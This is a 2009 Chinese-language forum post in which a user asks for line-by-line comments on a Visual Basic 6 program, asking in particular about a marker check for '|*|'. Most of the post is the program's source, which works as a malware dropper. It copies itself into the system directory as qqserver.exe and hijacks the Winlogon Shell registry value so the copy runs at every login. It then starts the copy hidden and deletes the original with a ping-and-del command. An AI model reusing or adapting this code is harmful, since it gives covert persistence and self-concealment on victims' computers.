|
|
|
<div style="FONT-SIZE: 12px">这段代码困扰我很长时间,帮忙注释一下<br/>谢谢啦<br/>特别是这句:<br/>If InStr(StrConv(FileArray, vbUnicode), "|*|") <= 0 Then<br/>这里面的文件是自己写的这个文件还是qqserer.exe?<br/>谢谢你了<br/><br/><br/>Private Declare Function GetModuleFileName Lib _<br/> "kernel32" Alias "GetModuleFileNameA" ( _<br/> ByVal hModule As Long, _<br/> ByVal lpFileName As String, ByVal nSize As Long) As Long<br/>Private Declare Function GetSystemDirectory Lib _<br/> "kernel32" Alias "GetSystemDirectoryA" ( _<br/> ByVal lpBuffer As String, _<br/> ByVal nSize As Long) As Long<br/><br/>Private Sub Form_Load()<br/>On Error Resume Next<br/> Dim FileArray() As Byte, SplitLine() As String, ExePath As String<br/><br/> Open GetMyFileName For Binary Access Read As #1 '读取要感染的问件内容<br/> ReDim FileArray(FileLen(GetMyFileName) - 1)<br/> Get #1, , FileArray<br/> Close #1<br/> <br/> ExePath = GetSystemPath & "\qqserver.exe"<br/> If InStr(StrConv(FileArray, vbUnicode), "|*|") <= 0 Then<br/> End<br/> ElseIf Fso.FileExists(ExePath) = False Then<br/> RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe " & ExePath, "REG_SZ"<br/> Fso.CopyFile GetMyFileName, ExePath, False<br/> Shell ExePath, 0<br/> Shell "cmd /c ping 127.0.0.1&&del /f /q /a:- " & """" & GetMyFileName & """", 0 '首次运行删除自身<br/> End<br/> End If<br/>End Sub<br/><br/>Private Function GetMyFileName() As String<br/>On Error Resume Next<br/> Dim tmp As String * 255<br/> GetMyFileName = Mid(tmp, 1, GetModuleFileName(0, tmp, 255))<br/>End Function<br/><br/>Private Function GetSystemPath() As String<br/>On Error Resume Next<br/> Dim SystemPath As String<br/> SystemPath = String(255, Chr(0))<br/> GetSystemDirectory SystemPath, 254<br/> SystemPath = Left(SystemPath, InStr(SystemPath, Chr(0)) - 1)<br/> GetSystemPath = SystemPath<br/>End Function</div><br/><br/> |
|
发表于 2009-7-10 13:42:46
发表于 2009-11-7 04:17:27
